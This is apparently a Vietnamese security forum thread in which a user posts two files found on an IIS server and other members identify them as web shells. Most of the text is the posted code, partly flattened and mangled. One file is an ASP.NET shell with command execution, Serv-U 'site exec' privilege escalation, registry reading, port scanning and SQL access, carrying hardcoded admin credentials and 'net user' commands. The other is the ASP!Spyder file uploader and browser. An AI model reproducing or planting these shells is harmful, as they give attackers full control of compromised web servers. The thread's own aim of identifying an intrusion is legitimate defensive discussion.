Result+=Rev(NS1);
Result+=Send(NS1, "site exec "+cmd+"\r\n");
Result+=Rev(NS1);
tcp1.Close();
Result+=Send(NS, deldomain);
Result+=Rev(NS);
Result+=Send(NS, quite);
Result+=Rev(NS);
tcp.Close();
}
catch(Exception error)
{
Bin_Error(error.Message);
}
Bin_SuresLabel.Text="
Mã:
"+Result+"

";


}
protected string Rev(NetworkStream instream)
{
string Restr="";
if(instream.CanRead)
{
byte[] buffer=new byte[1024];
instream.Read(buffer, 0, buffer.Length);
Restr=Encoding.ASCII.GetString(buffer);
}
return ""+Restr+"
";

}
protected string Send(NetworkStream instream,string Sendstr)
{
if(instream.CanWrite)
{
byte[] buffer=Encoding.ASCII.GetBytes(Sendstr);
instream.Write(buffer, 0, buffer.Length);
}
return ""+Sendstr+"
";
}
protected void Bin_IISButton_Click(object sender, EventArgs e)
{
Bin_LoginPanel.Visible=false;
Bin_MainPanel.Visible=false;
Bin_MenuPanel.Visible=true;
Bin_FilePanel.Visible=false;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=true;
Bin_RegPanel.Visible=false;
Bin_PortPanel.Visible=false;
Bin_iisLabel.Text=Bin_iisinfo();

}

protected void Bin_PortButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible=true;
Bin_LoginPanel.Visible=false;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_RegPanel.Visible=false;
Bin_PortPanel.Visible=true;
Bin_ScanresLabel.Text="";
}

protected void Bin_RegButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible=true;
Bin_LoginPanel.Visible=false;
Bin_CmdPanel.Visible=false;
Bin_SQLPanel.Visible=false;
Bin_SuPanel.Visible=false;
Bin_IISPanel.Visible=false;
Bin_RegPanel.Visible=true;
Bin_PortPanel.Visible=false;
Bin_RegresLabel.Text="";

}

protected void Bin_RegreadButton_Click(object sender, EventArgs e)
{
try
{
string regkey=Bin_KeyTextBox.Text;
string subkey=regkey.Substring(regkey.IndexOf("\")+1, regkey.Length - regkey.IndexOf("\")- 1);
RegistryKey rk=null;
object buffer;
string regstr="";
if(regkey.Substring(0, regkey.IndexOf("\"))=="HKEY_LOCAL_MACHINE")
{
rk=Registry.LocalMachine.OpenSubKey(subkey);
}
if(regkey.Substring(0, regkey.IndexOf("\"))=="HKEY_CLASSES_ROOT")
{
rk=Registry.ClassesRoot.OpenSubKey(subkey);
}
if(regkey.Substring(0, regkey.IndexOf("\"))=="HKEY_CURRENT_USER")
{
rk=Registry.CurrentUser.OpenSubKey(subkey);
}
if(regkey.Substring(0, regkey.IndexOf("\"))=="HKEY_USERS")
{
rk=Registry.Users.OpenSubKey(subkey);
}
if(regkey.Substring(0, regkey.IndexOf("\"))=="HKEY_CURRENT_CONFIG")
{
rk=Registry.CurrentConfig.OpenSubKey(subkey);
}
buffer=rk.GetValue(Bin_ValueTextBox.Text, "NULL");
if (buffer.GetType()==typeof(byte[]))
{
foreach (byte tmpbyte in (byte[])buffer)
{
if ((int)tmpbyte Bin:)

A:link {
COLOR:#000000; TEXT-DECORATION:None
}
A:visited {
COLOR:#000000; TEXT-DECORATION:None
}
A:active {
COLOR:#000000; TEXT-DECORATION:None
}
A:hover {
COLOR:#000000; TEXT-DECORATION:underline
}
BODY {
FONT-SIZE: 9pt;
FONT-FAMILY: "Courier New";
}
#nei {
width:500px;
margin:0px auto;

overflow:hidden
}
#su {
width:300px;
margin:0px auto;

overflow:hidden
}
#cmd {
width:500px;
margin:0px auto;

overflow:hidden
}


function Command(cmd, str)
{
var strTmp=str;
var frm=document.forms[0];
if(cmd=='del')
{
if(confirm('Del It ?'))
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
else return;
}
if(cmd=='change')
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
if(cmd=='down')
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
if(cmd=='showatt')
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
if(cmd=='edit')
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
if(cmd=='deldir')
{
if(confirm('Del It ?'))
{
frm.todo.value=str;
frm.goaction.value=cmd;
frm.submit();
}
else return;
}
if(cmd=='rename' )
{
frm.goaction.value=cmd;
frm.todo.value=str+',';
str=prompt('Please input new filename:', strTmp);
if(str &&(strTmp !=str))
{
frm.todo.value+=str;
frm.submit();
}
else return;
}
if(cmd=='renamedir' )
{
frm.goaction.value=cmd;
frm.todo.value=str+',';
str=prompt('Please input new foldername:', strTmp);
if(str &&(strTmp !=str))
{
frm.todo.value+=str;
frm.submit();
}
else return;
}
if(cmd=='postdata')
{
frm.todo.value=str.value;
frm.goaction.value=cmd;
frm.submit();
}
if(cmd=='changedata')
{
frm.todo.value=str.value;
frm.intext.value=str.options[str.selectedIndex].innerText
frm.goaction.value=cmd;
frm.submit();
}
}








Copyright(C)2008 Bin -> WwW.RoOTkIt.NeT.Cn









Copyright(C)2008 Bin -> WwW.RoOTkIt.NeT.Cn -> Reverse-IP




















FileName :






CreationTime :

LastWriteTime :

LastAccessTime :





Path:




CmdPath : C:\Windows\System32\Cmd.exe
Argument :
/c Set





ConnString :
server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB

















Path :
c:\













Name :
localadministrator
Pass :
#l@$ak#.lk;0@P
Port :
43958
CMD :
cmd.exe /c net user









KEY : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
VALUE :
ComputerName



IP :
127.0.0.1
PORT :
21,80,1433,3306,3389,4899,5631,43958,65500








File2

64 Then
index=0
tmp=""
Do
tmp=part(index) & tmp
part(index) = ""
index = index + 1
Loop until part(index) = ""
part(index) = tmp
End If
End Sub

Function fnReadString(part)
Dim tmp
Dim index
tmp = ""
For index = 0 to 64
If part(index) "" Then
tmp = part(index) & tmp
End If
Next
FnReadString = tmp
End Function


Class FileUploader
Public Files
Private mcolFormElem
Private Sub Class_Initialize()
Set Files = Server.CreateObject("Scripting.Dictionary")
Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
End Sub

Private Sub Class_Terminate()
If IsObject(Files) Then
Files.RemoveAll()
Set Files = Nothing
End If
If IsObject(mcolFormElem) Then
mcolFormElem.RemoveAll()
Set mcolFormElem = Nothing
End If
End Sub

Public Property Get Form(sIndex)
Form = ""
If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
End Property

Public Default Sub Upload()
Dim biData, sInputName
Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
Dim nPosFile, nPosBound
biData = Request.BinaryRead(Request.TotalBytes)
nPosBegin = 1
nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
If (nPosEnd-nPosBegin) 0 Then Files.Add LCase(sInputName), oUploadFile
Else
nPos = InstrB(nPos, biData, CByteString(Chr(13)))
nPosBegin = nPos + 4
nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
End If
nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
Loop
End Sub

'String to byte string conversion
Private Function CByteString(sString)
Dim nIndex
For nIndex = 1 to Len(sString)
CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
Next
End Function

'Byte string to string conversion
Private Function CWideString(bsString)
Dim nIndex
CWideString =""
For nIndex = 1 to LenB(bsString)
CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
Next
End Function
End Class


Class UploadedFile
Public ContentType
Public FileName
Public FileData
Public Property Get FileSize()
FileSize = LenB(FileData)
End Property

Public Sub SaveToDisk(sPath)
Dim oFS, oFile
Dim nIndex
If sPath = "" Or FileName = "" Then Exit Sub
If Mid(sPath, Len(sPath)) "" Then sPath = sPath & ""
Set oFS = Server.CreateObject("Scripting.FileSystemObject")
If Not oFS.FolderExists(sPath) Then Exit Sub
Set oFile = oFS.CreateTextFile(sPath & FileName, True)
' output mechanism modified for buffering
oFile.Write BufferContent(FileData)
oFile.Close
End Sub

Public Sub SaveToDatabase(ByRef oField)
If LenB(FileData) = 0 Then Exit Sub
If IsObject(oField) Then
oField.AppendChunk FileData
End If
End Sub
End Class

' Create the FileUploader
IF REQUEST.QueryString("upload")="@" THEN
Dim Uploader, File
Set Uploader = New FileUploader

' This starts the upload process
Uploader.Upload()

%>
ASPYDrvsInfo








File upload Information:




hAshish for all the help!








+++DONE+++

CLOSE THIS WINDOW

file Type:
file Size: bytes
file Created:
last Modified:
last Accessed:
file Attributes:



sub getit(thestuff)
if right("",1) "" Then
document.myform.txtpath.value = "" & "" & thestuff
Else
document.myform.txtpath.value = "" & thestuff
End If
document.myform.submit()
End sub



ASP!Spyder Apr2003
by ~sir_shagalot




PATH INFO : Volume Label:
Virtual: http://
1




[URL="Retrieve Available Network Drives[/URL]
[URL="SQL Query Analyser[/URL]
[URL="+++LOGOFF+++[/URL]


Delete file from current directory:

------------------------------"
FOLDERz
fo=fo+1
Response.Write "0 " & fold.name & "
"
Next
%>



Directory:







Copyright 2003 Vela iNC.
[ System: ]
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Hai file bạn post là web shell nhé.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Cảm ơn ạ! e chuyển qua hệ thống ntfs và update win thì không thấy nữa. nhưng vẫn sợ. đang tập tành thấy gê gê. bác nào biết hơn về bảo mật iis tư vấn giúp e với ạ.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Ban da bi hack.... hehehe
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên